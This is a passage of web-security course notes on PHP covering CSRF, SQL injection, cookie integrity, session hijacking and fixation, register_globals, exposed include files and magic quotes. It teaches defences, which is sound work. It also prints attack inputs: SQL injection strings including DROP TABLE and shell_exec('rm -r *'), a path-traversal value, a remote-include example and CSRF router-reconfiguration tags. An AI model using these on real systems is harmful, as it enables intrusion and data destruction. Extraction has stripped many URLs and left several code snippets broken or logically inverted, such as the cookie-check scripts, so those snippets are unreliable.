data returned from the third party server.
Since CSRF attacks are the result of the requests sent then the same origin policy does not protect
against a CSRF attack.
More CSRF Attacks
There have been many examples of CSRF based exploits. These include,
 CSRF vulnerability on (2008, online banking) whereby an attacker can transfer
money out of a victim’s online bank account. For example,
<img src=
 (2007), whereby an attacker can add videos to the victim’s account, add
himself to the friend/family groups of the victim, share victim’s contacts, flag videos, etc.
 Making changes to home DSL routers (2006). Even if the victim doesn’t know that he can
congure his router!
Attacker website uses CSRF with default userid/password for router:
<img src=http://admin:password@> and then re-configures, for example to
change the DNS,
<img src=
Strategy to Help Avoid CSRF Attack?
You want to force users to use your own forms when submitting data to your website.
Problem with the above attacks is that the websites allowed GETs whereby the data can be provided
in the URL as parameter.
Any data that is going to be acted upon by a website should be submitted via a POST.
 Forms should use POST.
 Your PHP script should use $ POST and not $ REQUEST in the form processing logic.
This still won’t work!
The attacker can create an HTML page that includes a POST form with hidden fields for all of the
relevant parameters required for the attack and has its target set to the vulnerable URL. JavaScript
(or Flash) is used to automatically submit the form when the exploit is loaded.
Cookies Alone Won’t Prevent CSRFs
If a web-application relies solely on HTTP cookies as its mechanism for transmitting session tokens
then it is still at risk from this attack.
Cookies, even the secret ones, will be submitted with every request. All authentication tokens will be
submitted regardless of whether or not the end-user was tricked into submitting the request.
Session identifiers are simply used by the application container to associate the request with a
specific session object. The session identifier does not verify that the end-user intended to submit
the request.
Preventing CSRF Attacks Using Synchronizer Tokens
The strategy to avoid CSRF is for the application to include a synchronizer token in the HTML form.
This is a secure random value that is stored in a hidden field in the form (often called CSRFToken).
Every request for the form yields a different value embedded in the form and the attacker cannot
guess the the value in a form presented to another user.
<form action="/" method="post">
<input type="hidden" name="CSRFToken"
When data, presumably from this form, is submitted to the application then the application must
look for and check that the synchronizer token is the value expected.
This interaction is simple form of challenge-response protocol whereby the application expects to
see its challenge embedded in the form as part of the response from a client.
We must be careful how we implement the synchronizer tokens.
For example, a naive implementation might maintain a list of issued synchronizer tokens in the
 Check that token in a POST is on this list,
 List will become very large unless we only keep track of recently issued tokens, and let older
tokens expire.
 Need to relate the token to the session, otherwise a malicious user could first request a form
in order to obtain a valid and fresh token which is then used in a CSRF involving the form.
But this places a burden (state) on the application. A better strategy is to make it stateless by also
‘embedding’ the synchronizer within the session cookie. On receiving the HTTP request the
application then checks that the token provided in the form matches the value embedded in the
The attacker will need to know the cookie value in order to construct a valid looking request and
carry out the CSRF attack.
Implementing the CSRF Synchronizer in PHP
We modify the setCurrentImage form to include a hidden CSRFTokenc field with a randomly
generated value. This token is unique to and is stored in the user’s session. (weaker token is
md5(uniqid(rand(), TRUE)))
$CSRFToken = openssl_random_pseudo_bytes(32,True);
$_SESSION[’CSRFToken’] = $CSRFToken;
$_SESSION[’token_time’] = time();
<form action="setCurrentImage.php" method="post">
<input type="hidden" name="CSRFToken" value="<?php echo $CSRFToken; ?>" />
Symbol: <input type="imageID" name="imageID" /><br />
<input type="submit" value="Set" />
Application setCurrentImage.php can now check a request for the correct token.
if ($_POST[’CSRFToken’] == $_SESSION[’CSRFToken’] &&
time() - $_SESSION[’token_time’] <= 300) {
// valid request via the form that was recently
// issued to the user in this session
This strategy works so long as the attacker cannot discover the session cookies and synchronizer
token transmitted to/from the user/application.
Avoiding CSRF
At the Server:
 Allow GET requests to only retrieve data, not modify any data on the server. This protects
sites from CSRF attacks using <img > tags or other type of GET requests.
 Require all POST requests to include a synchronizer token.
 If really critical, use CAPTCHAs, ...
At the Client:
 Logoff immediately after using a Web application
 Do not allow your browser to save username/passwords, and do not allow sites to
remember your login
 Do not use the same browser session to access sensitive applications and to surf the Internet
freely (tabbed browsing).
 The use of plugins such as No-Script makes POST based CSRF vulnerabilities difficult to
SQL Injection
Login Application (variation)
Suppose that a login application provided a Forgot Password page whereby a user who has forgotten
their password can request it to be sent to their email address:
<form action="" method="GET">
<p> Email Address: <input type="text" name="email" /></p>
<p> <input type="submit" /></p>
For simplicity, we’ll assume an unsalted password table:
CREATE TABLE ’passwordTable’ (
’username’ varchar(8) NOT NULL,
’password’ varchar(8) NOT NULL,
’email’ varchar(30) NOT NULL,
PRIMARY KEY (’username’)
Suppose that the request.php script includes the code:
// $tbl_name is the password table
$sqlQ="SELECT * FROM $tbl_name WHERE email=’$myemail’";
if($count==0) {
exit ("No user with this email address ".$myuserid) ;
$row= mysql_fetch_array($result);
$body= "your password is ".$row["password"];
$subject = "Your password";
echo ’Password mailed to ’.$myemail;
Discovery Registered Users
Malicious Mike uses this form to test for email address of registered users.
For example, the request
might result in the "No user with this email [...]" message, while
results in a message "password mailed to"
SQL Injection Attack 1
Malicious Mike makes the HTTP request:’ OR 1==1-this results in the following SELECT in the application:
FROM $tbl_name
WHERE email= ’’ OR 1==1--’
(note that the -- forces SQL to drop trailing quotes)
This selects the entire table and the particular (poor) logic in the application will take one of the
selected rows and email the password to the user.
For example, malicious Mike gets the message "password mailed to" and deduces
that this is a registered user!
SQL Injection Attack 2
SQL injection attack may occur if input data is not properly parsed.
In our example we should have checked that the input data was a properly formed email address.
IETF document RFC 3696, Application Techniques for Checking and Transformation of Names
specifies the only acceptable format for an email address.
The PHP function filter var can be used to do limited filtering/checking of email addresses, URLs, etc.
For example,
filter_var(’’, FILTER_VALIDATE_EMAIL);
returns the email address if valid, otherwise false.
Note filter var() does not conform to RFC 3696 and will pass a number of strings that are not proper
email addresses. For example, s.foley@ucc.
See email/ for a well designed filter.
Exploiting Injection Attacks
Suppose that the login.php script allows up to three failed login attempts before disabling the
We could use SQL injection to directly test the backend for userid/password combinations and
bypass the 3-attempts control. Having discovered that is in the table, malicious
Mike guesses passwords:’ AND password=’attempt1
which translates into the backend query
FROM $tbl_name
WHERE email= ’’ AND password=’attempt1’
Malicious Mike knows that he has guessed the correct password for the user when he gets a
"password mailed to" message.
More SQL Injections
A variety of statements can be injected in this way. For example,’;
INSERT INTO passwordTable
VALUES (’simon’, ’nomis’, ’’);-’; DROP TABLE ’passwordTable
28’; shell_exec(’rm -r *’); -SQL injection attacks may require the attacker to know the table and attribute names in the backend
However, if the attacker does not know the information he can test and/or guess it. For example,
GET and POST parameter names may provide a hint about table attribute names.
Also, most DBMS also store information about the database in tables with predefined names.
For example, mysql.user gives the table of mysql database users and maybe accessible if the web
application happens to be running with the same permissions as the database administrator (root).
Avoiding SQL Injection Attacks: Escaping Strings
Your application should filter input data: check that input is as expected.
Your application should escape output: ensure that data sent to the database cannot be
misinterpreted. For example, "O’Sullivan" should be output to the database as "O\’Sullivan".
Use function mysql real escape string() to escapes special characters in the unescaped string so that
it is safe to place it in a mysql query().
$myemail= $_GET[’email’];
$filteremail= filtervar($myemail, FILTER_VALIDATE_EMAIL);
$cleanemail= mysql_real_escape_string($filteremail);
// ...
$sqlQ="SELECT * FROM $tbl_name WHERE email=’$cleanemail’";
// ....
Don’t forget that the result of a query might in turn be used as part of a further query to the DBMS
(and therefore should be escaped).
Avoiding SQL Injection Attacks: Escaping Integers?
Escaping parameters using mysql real escape string( is OK for strings, but it may not work for integer
parameters. For example, suppose our tablehad another (integer) attribute userid, then:
$myuserid= $_GET[’id’];
$cleanuserid= mysql_real_escape_string($myuserid);
// ...
$sqlQ="SELECT * FROM $tbl_name WHERE userid=$cleanuserid";
// ....
The problem here is that the query assumes an integer parameter and is therefore written without
quotes. An injection attack string "1 OR 1==1--" does not need the breaking quote as SQL interprets
the query as "SELECT * FROM $tbl name WHERE userid=1 OR 1==1--";
The solution is to either use quotes in the query or validate/clean the input value as an integer (so it
really is clean).
$cleanuserid= filtervar($myuserid, FILTER VALIDATE INT);
Avoiding SQL Injection Attacks: Stored Procedures
To further defend against the possibility of SQL injection attack we can define the intended SQL
queries as Stored Procedures which ensure that the intended query cannot be modified by injected
$myemail= $_GET[’email’];
$filteremail= filtervar($myemail, FILTER_VALIDATE_EMAIL);
$cleanemail= mysql_real_escape_string($filteremail);
// ...
$preparedStatement = $db->
prepare("SELECT * FROM $tbl_name WHERE email = :email");
$preparedStatement->execute(array(’:email’ => $cleanemail));
Any parameters passed to the compiled query will be treated as strings and cannot be misinterpreted as part of the query command.
Passing string "’ OR 1==1--" will simply result in a search for a user with email
"’ OR 1==1--".
Defence in Depth
 Use stored procedures, filter input, ...
 Do not give your application root access to the DBMS. A compromised application with root
access can do far more damage than an ’ordinary’ database user since it can access the
database administration tables (users, etc), drop arbitrary tables, etc. Create a separate
database user for your database application.
 Do not run the DBMS using the administrator account (eg root) of the operating system. An
injection attack on an application running on a DBMS that is running as root could use shell
exec to execute any operating system command. Create a separate system user to run the
 Prevent PHP from calling OS commands. Disable shell command in the php.ini configuration
file: set flag disable functions to include exec,shell exec,system,proc open,popen, ...
SQL injection results from:
 Failure to filter input data to application
 Failure to escape output from application to database
Avoiding SQL injection attacks:
 Filter input data to application
 Escape output from application to database
 Principle of least privilege: don’t give the application more authority (DBMS, OS, etc.) than it
requires. Don’t run it as root/superuser.
Cookies & Sessions
The HTTP protocol is stateless.
All HTTP requests are treated as independent events, even when they come from the same client.
Cookies provide a mechanism whereby a web-server can manage a stateful relationship with a
browser by storing the related state in the client browser and not on the server.
 The server assigns some state to a cookie, which it includes in the HTTP response.
 The browser stores the cookie in its browser.
 The browser includes any cookie(s) it may hold for a web-site when making an HTTP request
to that website.
Cookies can be used to store a variety of information, for example visit tracking information,
authentication information, etc.
Secure Cookies
An attacker can eavesdrop over an HTTP connection and gather copies of cookies. This is a concern if
the cookie contains sensitive information such as usernames and passwords.
HTTPS can be used to support authentic and secure HTTP requests and responses: the client may be
sure of the identity of the server and the requests/responses are sent in encrypted form over HTTP.
The secure flag in a cookie is set by the web-server and indicates that the cookie should only be
transmitted over a secure HTTPS connection from the client.
When set to TRUE, the cookie will only be set if a secure connection exists.
It is up to the developer to decide whether the web application sends this kind of cookie and to be
sure that the connection is over HTTPS.
The browser will ignore a secure cookie that is not received over HTTPS.
Cookie Integrity
An attacker that controls the connection can also interfere with the values. HTTPS can be used to
secure the connection from this kind of attack.
Once the browser receives the cookie, a malicious client can easily modify the cookie value (either
directly, or via a proxy such as Paros).
The server can use a cryptographic one-way hash function to ensure the integrity of a cookie value.
Attempted solution: given a cookie with identifier id and value v, then, given some secret known
only to the server, compute a cryptographic checksum using a suitable one-way hash function h():
ck = h(v, secret)
and include this hash value in the cookie. An attacker cannot forge ck without knowing the secret.
Before using a cookie presented by the browser the application should re-compute the checksum
and confirm it matches the checksum provided.
PHP script protecting the integrity of the variable value
$secret="my server secret";
$seperator = ’--’;
if (!isset($_COOKIE[’views’])){
$cut=explode($seperator, $_COOKIE[’views’]);
if (md5($cut[0].$secret)==$cut[1]){
die(’Cookie data corrupted’);
$splice=$views . $seperator . md5($views.$secret);
echo "I have now seen you = ". $views . " times";
Problems With The Script
The script only attempts to prevent the cookie variable value v from corruption: it implements the
cookie as [id, v, d, p, h(v, secret)].
A malicious client could take a copy of the cookie [id, v, d, p, h(v, secret)] and change, for example,
the expiry date to d′ resulting in the valid cookie [id, v, d′, p, h(v, secret)].
A determined and malicious client might have another cookie [id′, v′, d′, p′, h(v′, secret)] from the
same server for a different variable id′. If the same secret was used to compute the checksum of this
cookie then the attacker can cut-and-paste variable values to give, for example, the ‘valid’ cookie [id,
v′, d, p, h(v, secret)].
We need to secure all the values in the cookie from modification.
A Tasty (Good) Cookie Recipe
Given cookie attributes
$secret a server secret
$id a variable identifier,
$v a value for the variable
$d an expiry date,
$p path information,
then compute a checksum $ck= h($id,$v,$d,$p,$secret, ...), given a suitable one-way hash function
h() and a server $secret. sha1 is a reasonable one-way hash function for this.
Then we do: setcookie($id, "$v--$ck", $d, $p), where -- is the separator to enable us to distinguish
between the variable value and the checksum.
A Tasty (Good) Cookie Script
$secret="my server secret";
$separator = ’--’;
if (!isset($_COOKIE[$id])){
$cut=explode($seperator, $_COOKIE[$id]);
if (md5($values)==$cut[1]){
die(’Cookie data corrupted’);
$splice=$views.$id.$expiry.$path. $secret . $seperator . md5($views);
echo "I have now seen you = ". $views . " times";
No Perfect Cookie
A determined and malicious client can still replay ‘old’ cookies with this recipe. For example, when
visiting for the fifth time, the client keeps a copy of the cookie. At some later date when the client
visits for the tenth time the client can easily replay the old fifth cookie.
The server could include a sequence number in the hashed cookie and then keep track of the last
sequence number issued to each client. However, this requires state at the server side which defeats
the purpose of the cookie.
If we are concerned about replay of cookie state then the server should manage the state and use,
for example, a PHP session to relate the state to the visiting client (we’ll see this shortly).
Authentication Cookies
When a user logs in (eg authenticated using the login.php code described earlier in notes) then an
authentication cookie is set in the browser by the login program for the website and path.
user ! website HTTP request, ... userid, password
website ! user HTTP Response, ... AuthCookie
When the authenticated user subsequently makes an HTTP request to the website, the
authentication cookie is included.
user ! website HTTP request, ... AuthCookie
Before responding, the website must check that the authentication cookie is valid for the given
While the underlying mechanics is not unlike Basic HTTP authentication, the advantage to using
authentication cookies is that we can associate other attributes with the cookie, such as expiry
dates, access constraints, etc.
A Tasty Authentication Cookie
We can use our ‘tasty’ recipe for authentication cookies.
Let capability be a string of attributes that denotes what can be done by a user presenting the
cookie. For example, it could include the userid and the URL (to which the user has access).
Let expiry be the expiry date of the capability.
If serverSecret is a secret known only to the server then the cookie is
cookie = (capability,expiry, h(capability.expiry.serverSecret))
So long as h() is a cryptographically strong one-way hash function then the authentication cookie
cannot be forged by a malicious user. Furthermore, a legitimate holder of a cookie cannot modify it
in order to obtain a different capability.
Minimal work is required at the server to validate the cookie, which is good.
Make sure the cookie is sent over HTTPS!
A not so tasty authentication cookie: [circa 1999]
When a user logs into the website (providing userid and password) an authentication cookie is given
to them which contains their userid and sequence number as plaintext (roughly speaking, it was
actually encoded using GET attributes).
On a subsequent visit, the presented cookie is validated by the server which checks that the
sequence number is valid for the given user.
However, the scheme used predictable sequence numbers: when a user logs in, the sequence
number is simply incremented! This meant that an attacker had a good chance of
guessing/predicting other user’s sequence numbers (at the time, had about 1 userlogin per second).
Userids, passwords and sequence numbers where also sent over HTTP which meant that they were
vulnerable to an eavesdropping attack.
Cookies and Privacy
When viewing a Web page, images or other objects may set cookies in the visitor’s browser.
A cookie may include information about a visitor that is known by they website that created it: the
visitor’s IP address, browsing activity, account information, etc.
This information may be used to help tailor advertisements to visitors. Sites may share this
information and result in a loss of privacy of the visitor.
First-party cookies are cookies that are set by the same domain that is in your browser’s address bar.
Remember that a site cannot issue a cookie related to a different domain.
Thus, first party cookies can be used to track visitor actions within the domain/website.
Third Party Cookies
Third-party cookies are cookies that are set by one of objects, images, etc within the web page but
coming from a different domain (to that of the web-page).
 User visits,
 Page includes an image tag pointing to
 Loading the banner image silently sets/checks a cookie for the domain
Third party cookies can be used to track visitor actions across multiple domains/websites.
Most browsers permit third-party cookies by default, but can be configured to block third-party
Suppose that provides a third-party cookie tracking service to and The script tp.php includes
setcookie("TPtracking", "..." , $expires, "/" , "");
$image = "R0lGODlhBQAFAJH/AP///wAAAMDAwA ... \n";
header(’Content-type: image/gif’);
echo base64_decode($image); embeds a 1-pixel square image in index.html:
<img src=""
width="1" height="1" border="0" >
Further information could be passed to tp.php, such as information about what is being viewed on
the can use this cookie to track a visitor as he/she browses from to
Third party (cookie) sites: leaking your information
Provide advertising services.
 First-party sites arrange with ad networks to place ads on their pages via images or
javascript code.
 For example, Google’s Adsense (,, AOL
(,, Yahoo!(
Provide Analytics services:
 Measure traffic, characterize users by downloading a JavaScript file and send back
information in a URL.
 For example, (urchin.js), (Omniture),
(Microsoft/aquantive), (Quantcast)
Tie to a Person:
 provides email service, passes user identity to who can tie to
browsing at other (participating) sites.
PHP Sessions
PHP Sessions provide stateful support for a PHP application whereby certain data may be preserved
across subsequent accesses.
The data related to a visitor accessing a web-site is associated with a unique session id. The data
related to a visitor is stored at the website and the session-id is given to the user as a cookie (or
within the URL). On a subsequent access the session-id is used to retrieve the visitor information.
For example, suppose that instead of an authentication cookie we use a session to implement
(persistent) login:
// simon is authenticated and permitted access everything
$_SESSION[’userid’]= ’simon’;
$_SESSION[’access’]= ’all’;
echo ’Logged in’;
The resulting HTTP response
On the first visit by the user, a session id is set as a cookie in response:
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 13:13:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=a5873580a38a1032d77b452205103aae; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
This cookie (session id) is presented on each subsequent visit.
PHP also creates a file sess a5873580a38a1032d77b452205103aae in the (server) directory specified
by variable path in php.ini. This file contains the data associated with this visitor’s
Storing Secrets in Sessions
Recall our dictum that whenever possible we should avoid storing secrets.
Suppose that we stored the user’s password in the session
$_SESSION[’password’]= $userpassword;
One might argue that the secret is safe as it is stored on the server and not communicated to the
However, while the website developer may have been careful to properly protect the user
passwords in the mysql database he/she may have overlooked the fact that other applications on
the server might have access to that part of the file system that contains the session data.
We should therefore, wherever possible, secure the session variable values. For example,
$_SESSION[’password’]= sha1($userpassword);
Brute Force Session id Hijacking
If an attacker can determine the session identifier of another visitor then it may be possible for the
attacker to hijack the session and masquerade as the other visitor to the website.
For example, suppose that Bob’s website generates a new session id by simply incrementing the
value of the last session id issued.
 Alice connects/authenticates to Bob’s website and receives a session id (cookie) sessA.
 Suppose that malicious Mike knows that Alice recently connected to the website.
 Malicious Mike connects/authenticates to Bob’s website and receives a session id (cookie)
 Malicious Mike repeatedly decrements sessM and visits the website with the value as cookie
and will fairly quickly end up making an HTTP request to Bob that appears to come from an
authenticated Alice.
Session ids should be random and infeasible for an attacker to predict.
Suppose that Bob revised his session id algorithm so that when a new session is created the session
id is calculated as the md5 hash of the current time catenated with a 4-digit random number. For
 Alice visits website on Sun 7 Nov 2010 15:15, her session id is
c3cdfe22f6fa8c72e977db2858b538ad2753 (random val 2753).
 Malicious Mike visits the website on Sun 7 Nov 2010 15:17, and his session id is
 Assuming Mike knows that Alice visited recently, then Bob can brute force Alice’s session id
by testing session ids for recent times along with all possible 4-digit ‘random’ values.
Mike might have collected his past session identifiers and recognized patterns that indicate how
session identifiers are generated.
Randomness and Session ids
Just because c3cdfe22f6fa8c72e977db2858b538ad2753 is long and looks random does not mean it
is random: the last 4 digits provide the ‘randomness’ (assuming they are actually random) and
everything else in the number can be predicted.
Intuitively, Entropy gives us a measure of the underlying randomness in a variable. In the previous
example the entropy is given as approximately 13 bits (the number of bits that represent the
random value 0 .. 9999). [Assumes 4 digit numbers cannot be predicted in any way by an attacker]
The entropy gives us an idea of how much computational effort is required to guess the session id by
brute force means.
In practice, session ids should be at least 128 bits in length and should be generated by a secure
random number generator which should give an entropy of around the same number of bits.
Remember that PHP’s rand function is not secure (pretty close to 0 bits of entropy) and mt rand has
around 32 bits of entropy. The openssl secure random number generator is best.
Session ids in PHP
The standard support for session ids in PHP computes the session id as a one-way hash of a
combination of the IP address of the visitor, a time-stamp and the result from a random number
From php.ini:
session.entropy_length = 16
session.entropy_file = /dev/urandom
session.hash_function = 1
Here we select 16 bytes of entropy from /dev/urandom which is the usual Unix source of
’randomness’ for seeding a random number generator. We also select SHA-1, since it is
cryptographically better than MD5. If the file is left blank then the default seeding method is used
(above is LAMPS default).
Session ids in PHP
The standard configuration for session id calculation is weak as it uses a cryptographically weak
random number generator whereby the random numbers generated can be predicted with some
effort by the attacker (around 32 bits of entropy).
An attacker can brute force another user’s session id within approximately 251 hash operations,
which is feasible for a wealthy attacker (a modern GPU can achieve around 230 hash
In a security-critical application you should not rely on the standard PHP support for secure session
It should be configured to use a source of cryptographically strong random values and to use a
secure one-way hash function.
Session Fixation Attack
Remember that HTTP is stateless
 Session ids are used in an application are used to chain HTTP requests together/associate
with a visitor.
 Session ids are used on the server-side to maintain the session state.
 The authenticated state of a user is just one property of this state and its possible that the
session was created before the visitor authenticated himself/herself.
Usual strategy is:
 The very first HTTP response carries the session id to the user (and its not necessarily the
result of an authentication).
 Usually in form of a cookie
 This session id is used to chain subsequent individual HTTP requests
Session Fixation Attack: Overview
Session fixation attack: attacker tricks the victim into using a session id that the attacker already
1. The attacker is given a valid session id from a server. For example, as redirect (set in the URL).
2. The attacker tricks the victim to use this session id for his communication with the server.
For example, the victim follows the link as a result of a
3. In this session, victim sends his credentials to the server. For example, victim logs in and $
SESSION[’userid’] is set to their name.
4. From now on, the session is authenticated. As the attacker knows the session id, he now can
access the application under victims identity
A fixation attack can be avoided if the application regenerates the session id whenever the user
authenticates himself/herself and/or when there is a change of privilege.
Session Fixation Attack
The front page of a website creates a new session for the visitor with an empty shopping cart, if not
already created.
// ...
if (!isset($_SESSION[’cart’])){
// ...
At some point visitor decides to authenticate using login.php. This sets the session variable userid
(which is necessary in order to checkout, etc.).
// .... if authenticated then set session variable
$_SESSION[’userid’]= $userid;
// otherwise leave session variable unset
This mechanism is vulnerable to a session fixation attack.
Avoiding a Session Fixation Attack
When a user logs in then there is a change of privilege associated with the session id.
Whenever there is a change of privilege associated with a session id then the application should
generate a new session id for the session. That way, any other user (attacker) that happens to know
the session id prior to the change of privilege cannot know this new session id.
PHP function session regenerate id() performs this task.
The login.php can be revised as:
// .... if user is authenticated then set session variable
$_SESSION[’userid’]= $userid;
// otherwise leave session variable unset
Security of Session Identifiers
If an attacker can determine the session identifier of another visitor then it is possible for the
attacker as masquerade as the visitor to the website.
 Session ids should be communicated over HTTPS.
 Session ids must be sufficiently long so as to avoid a brute-force guessing of (likely) session
 Use cryptographically strong session id generation algorithm. It must not be possible for an
attacker to predict a session id.
 Session ids must expire when the user has finished visiting the website and/or within a
reasonably short period of time. Do not provide a ’remember me’ check box.
 Session ids should be regenerated when there is a change of the privilege associated with
the session.
 Session variables may contain sensitive information and should be protected on the server.
Miscellaneous PHP Security
Aside: Error Reporting
You should set the high level of error reporting either in the PHP configuration file php.ini as error
reporting = E ALL | E STRICT or programmatically as error reporting (E ALL | E STRICT);.
It is useful to have errors displayed in the browser during development, however, once in production
errors should not be displayed in the browser since they may convey useful information to an
attacker about a failure.This can be done by setting display errors to Off in php.ini or programatically
as ini set(’display errors’,’Off’);.
Its also important to maintain a log of errors as failures may indicate attacks/intrusion attempts.
ini_set(’error_reporting’,E_ALL | E_STRICT);
Making all these settings in both the php.ini file and programmatically provides defense in depth.
Register Globals
When set to true the php.ini directive register globals registers the EGPCS (Environment, GET, POST,
Cookie, Server) variables as global variables. As of PHP 4.2.0, this directive defaults to false.
Register globals make writing an application very easy: one simply refers to the form variable name,
for example, $username in the PHP script, instead of having to explicitly access it via a super global
array, for example, $ GET(’username’).
However, this may make it possible for an attacker to influence the execution of a PHP script by
being able to set (‘poison’) the value of any variable in the script.
Variable Poisoning under Register Globals
// define $authorized = true only if user is authenticated
if (authenticated_user()) {
$authorized = true;
// Because we didn’t first initialize $authorized as false, this might be
// defined through register_globals, like from GET auth.php?authorized=1
// So, anyone can be seen as authenticated!
if ($authorized) {
include "/highly/sensitive/data.php";
With register globals enabled the logic above may be compromised.
When register globals is disabled, $authorized can’t be set via request and the code executes as
Regardless of whether register globals is set, it is good programming practice to initialize variables;
initializing $authorized to false ensures the code is safe regardless of the setting of register globals.
Variable Poisoning under Register Globals
Assuming register globals is set, consider:
include "$path/script.php";
With register globals enabled, this page can be requested with query
? resulting in:
include ’’;
If allow url fopen is enabled (it is by default), this will include the output of
just as if it were a local file. This is a major security vulnerability, and it is one that has been
discovered in some popular open source applications.
Defensive Programming with Register Globals
It is not safe to simply assume that your application will never be deployed on a server with register
globals enabled: there is always the chance that the server might have it enabled either by accident
or deliberately because another application on the same server requires it to be enabled.
You should write your code as if register globals is enabled.
Make sure you initialize all your variables and during development set error reporting to E ALL (all
errors and warnings) or E ALL | E STRICT (all errors and warnings and suggest changes to code) to
alert yourself to the use of un-initialized variables.
Not advisable to unset register globals programatically since your application may be shared with
other applications that may wish to set it. Also, programmatic access to this variable is deprecated as
an ini set option in PHP 5.3.0.
Defensive Programming with Register Globals
Your code can also look for possible variable poisoning attempts. For example, suppose that a script
uses a cookie named mycookie. An attacker might attempt to poison this cookie via a GET or a POST.
The script can do a simple sanity check:
if (isset($_COOKIE[’mycookie’])) {
// mycookie comes from a cookie.
// Be sure to validate the cookie data!
} elseif (isset($_GET[’mycookie’]) || isset($_POST[’mycookie’])) {
mail("", "Possible breakin attempt",
echo "Security violation, admin has been alerted.";
} else {
// mycookie isn’t set through this REQUEST
PHP Includes and Requires Files
PHP include and require allow a script to be developed/organized over a number of files.
 include() takes all the content in a specified file and includes it in the current file. If an error
occurs include() generates a warning, but the script will continue execution.
 include once() same as include() except that if the code from a file has already been
included, it will not be included again.
 require() is identical to include(), except that require() generates a fatal error, and the script
will stop.
 require once() same as require() except that if the code from a file has already been included
(require), it will not be included (require) again.
Exposed source code with includes and requires
Include (and require) files often use a .inc file extension and are stored within the document root.
Apache does not recognize this file extension as requiring any special action (unlike .php) and as a
result the include files can be requested and displayed in the user browser as plain text.
For example, an application includes the file
$host= ’localhost’;
$user= ’root’;
$password= ’root’;
$db = ’CS3511’;
$dbconnection = mysql_connect($host, $user, $password);
// ....
Given a GET request on this file, Apache will respond with its contents as plain text (it does not
interpret the .inc extension as a PHP file to be executed as PHP).
Backdoor URLs
A backdoor URL is a resource that can be accessed directly via a URL when direct access is
unintended or undesired. For example, a web application might display sensitive data to
authenticated users:
// ...
$authenticated= authenticate_user();
if ($authenticated){
include ’./sensitive.php’;
Since sensitive.php is within the document root then it can be accessed directly by the attacker,
bypassing the intended authentication step.
To prevent a backdoor URL, place your includes outside of the document root. The only files that
should be stored within the document root are those that must be accessible by a URL.
Includes Filename Manipulation
Part of the filename or pathname is stored in a variable in a dynamic include. For example, you
might cache some dynamic parts of a web-page to alleviate the load on the database server: the
cache for user simon is stored in /cache/simon.html.
Include "/cache/{$_GET[’username’]}.html";
This is vulnerable to filename manipulation and path traversal attacks.
For example, an attacker supplies ../../etc/httpd.conf%00 (on some platforms a null value may
terminate the string).
If your code requires dynamic includes then you must be sure that data is properly filtered, etc.
Defenses against exposed includes and requires
Use a .php extension for all includes and requires. For example,
Configure Apache to deny requests for .inc resources. In httpd.conf:
<Files ~ "\.inc$">
Order allow,deny
Deny from all
Place all requires and includes outside of the document root.
Always filter your input data: never include, require, or otherwise open a file with a filename based
on user input, without thoroughly checking it first.
Don’t rely on just one defense, aim for defense in depth.
PHP Type Juggling
PHP is weakly typed. Variables need not be declared with explicit types and PHP can be left to
automatically decide how to convert a value of one type to another.
Use type casting to avoid type juggling vulnerabilities
Suppose that we expect product identifiers (ids) to be integers, then:
$myId = filter_var($_GET[’id’],FILTER_VALIDATE_INT);
$sql = ’SELECT * FROM table WHERE id = ’.$myId;
We are using the integer filter that’s built into PHP5.2. However, the logic could be much more
complex, with perhaps operations applied to the value of $myId. To be extra sure that the integer
passed to SQL is indeed an integer, we should cast it as such:
$myId = filter_var($_GET[’id’],FILTER_VALIDATE_INT );
$sql = ’SELECT * FROM table WHERE id = ’.(int)$myId;
Magic Quotes
The PHP magic quotes directive was meant to prevent SQL injection by automatically escaping all
data in $ GET, $ POST and $ COOKIE by placing backslashes before characters that need to be quoted
in database queries etc (according to the addslashes() function).
For example, addslashes("O’Connor") returns "O\’Connor" which shouldn’t cause an injection
concern when part of a SQL query "SELECT .... O\’Connor ....".
However, the escaping using addslashes() may not be native to the DBMS used by your application.
You should use mysql real escape string().
You should never rely on Magic Quotes.
Magic Quotes Failure
The GBK character set is used for simplified Chinese characters. Characters are encoded as one byte
or as two bytes.
For example, the character is encoded as the two byte value 0xbf5c. This can also be interpreted as
two single-byte characters (¿) and (\).
Some two-byte values are not defined in the character set. For example, 0xbf27 is invalid and is just
two single-byte characters (¿) and (’).
Thus, addslashes(0xbf27) can be interpreted as the byte characters (¿) and (’) and will be escaped to
give sequence (¿\’).
However, the byte value of this resulting string is 0xbf5c27 where the first two bytes are interpreted
as a valid character under GBK, followed by a quotation mark, that is the string ( ’).
Thus, if the string is to be passed to a database query then it becomes possible to inject a quote into
the string and providing a foundation for a SQL injection attack.
Magic Quotes Mitigation
You should not assume that Magic Quotes is disabled: your application may run on a server over
which you have no control. Your code should undo the ’work’ of addslashes
functionsafeSQLstr($str) {
if(function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc() ) {
$str= stripslashes($str);
return mysqli_real_escape_string($str);
functionsafeHTMLstr($str) {
if(function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc()) {
$str= stripslashes($str);
return htmlspecialchars($str);
And you should be clear about the character set your application uses: mysql set charset(’utf8’,
Good Coding Practices
 Identify input
 Filter input to application
 Validate input
 Sanitize input
 Escape output
Identify application input data sources
The application developer must identify all input data to the program.
The superglobal arrays $ GET, $ POST, etc. are easy to identify as input. There are also less obvious
sources of ’input’:
 Is there a possibility that Register Globals is set?
 $ SERVER is an array containing information such as headers, paths, and script locations.
Some of its elements are obtained from the server, for example, $ SERVER[’HOST’].
However, others may be manipulated by the client, for example, $ SERVER[’REFERER’]. Best
practice treats all elements in $ SERVER as input data.
 While data from session data stores and databases might not be initially considered as
‘input’, best practice recommends that it be treated as input as it provides defense in
 And anything else. For example, RSS feeds, web-services, etc.
Filter Input
There are two main types of filtering: validation and sanitization.
Validation is used to validate or check whether the data is as expected (has integrity). For example,
whether a date is valid, whether Gender is M or F, whether email address has a valid format, etc.
Sanitization will sanitize the data, so it may alter it by removing undesired characters. For example,
removing characters that are inappropriate for an email address to contain, but does not validate
the data.
Filter Input: Validation
Function filter var($variable, filter-name) applies the given filter to the value of a variable, returning
the filtered data if valid; otherwise false.
 FILTER VALIDATE EMAIL determines whether email address is valid.
 FILTER VALIDATE URL determines if URL conforms to RFC2396.
 FILTER VALIDATE IP determines whether IP address is valid.
Variations of filter var can be applied to arrays, etc.
if (filter_input(INPUT_GET, ’email’, FILTER_VALIDATE_EMAIL)) {
echo "This email address is considered valid.";
